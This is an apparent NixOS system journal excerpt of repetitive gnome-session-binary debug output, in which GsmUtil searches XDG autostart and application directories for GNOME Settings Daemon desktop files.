machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: found in XDG dirs: '/run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.A11ySettings.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking for file 'org.gnome.SettingsDaemon.Color.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.config/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: found in XDG dirs: '/run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.Color.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking for file 'org.gnome.SettingsDaemon.Datetime.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.config/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: found in XDG dirs: '/run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.Color.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking for file 'org.gnome.SettingsDaemon.Datetime.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.config/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/applications'
